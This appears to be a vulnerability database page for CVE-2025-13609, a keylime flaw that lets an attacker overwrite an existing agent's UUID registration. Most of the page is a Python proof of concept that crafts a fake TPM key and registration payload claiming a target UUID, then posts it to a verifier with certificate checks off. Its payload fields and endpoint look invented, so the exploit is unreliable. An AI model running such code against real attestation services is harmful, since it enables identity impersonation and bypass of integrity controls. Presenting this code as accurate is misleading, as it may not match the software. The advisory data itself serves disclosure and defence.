Security Vulnerability Report
CVE-2025-13609 CVSS 8.2 HIGH

Published: 2025-11-24 18:15:50
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

keylime < 6.5.3
keylime < 6.6.2
keylime < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13609 PoC - Keylime UUID Impersonation Attack
# This PoC demonstrates the UUID hijacking vulnerability in keylime agent registration
import requests
import json
import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

TARGET_KEYLIME_VERIFIER = "https://keylime-verifier.example.com:8881"
TARGET_UUID = "legitimate-agent-uuid-to-hijack"
ATTACKER_IP = "attacker-controlled-ip"


def generate_fake_tpm_keypair():
    """Generate a fake TPM keypair for the attack"""
    private_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )
    public_key = private_key.public_key()
    return private_key, public_key


def create_malicious_registration_request(uuid, public_key):
    """Create malicious agent registration request"""
    pub_key_pem = public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo
    )
    pub_key_hash = hashlib.sha256(pub_key_pem).hexdigest()
    registration_payload = {
        "v": "1.0",
        "ip": ATTACKER_IP,
        "port": 9002,
        "uuid": uuid,
        "aik_sha256": pub_key_hash,
        "aips": ["127.0.0.1"],
        "mb_refquote": "fake_quote_data",
        "quote_signature": "fake_signature"
    }
    return registration_payload


def exploit_uuid_hijacking(target_verifier, target_uuid):
    """
    Exploit keylime UUID hijacking vulnerability
    Attack: Register with different TPM but claim existing UUID
    """
    print(f"[*] Starting UUID hijacking attack on {target_uuid}")

    # Step 1: Generate fake TPM keypair
    print("[*] Generating fake TPM keypair...")
    priv_key, pub_key = generate_fake_tpm_keypair()

    # Step 2: Create malicious registration request
    print("[*] Crafting malicious registration request...")
    payload = create_malicious_registration_request(target_uuid, pub_key)

    # Step 3: Send registration request (overwrites legitimate agent)
    print("[*] Sending registration request to overwrite UUID...")
    try:
        response = requests.post(
            f"{target_verifier}/agents",
            json=payload,
            headers={"Content-Type": "application/json"},
            verify=False,
            timeout=10
        )
        if response.status_code in [200, 201, 202]:
            print("[+] SUCCESS: UUID hijacked! Attacker now controls the agent identity")
            print(f"[*] Attacker can now impersonate {target_uuid}")
            return True
        else:
            print(f"[-] Registration failed: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    exploit_uuid_hijacking(TARGET_KEYLIME_VERIFIER, TARGET_UUID)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13609",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T18:15:49.830",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.3
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-694"}]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/errata/RHSA-2025:23201", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23210", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23628", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23735", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2025:23852", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2026:0429", "source": "[email protected]"},
      {"url": "https://access.redhat.com/security/cve/CVE-2025-13609", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2416761", "source": "[email protected]"},
      {"url": "https://github.com/keylime/keylime/issues/1820", "source": "[email protected]"}
    ]
  }
}
```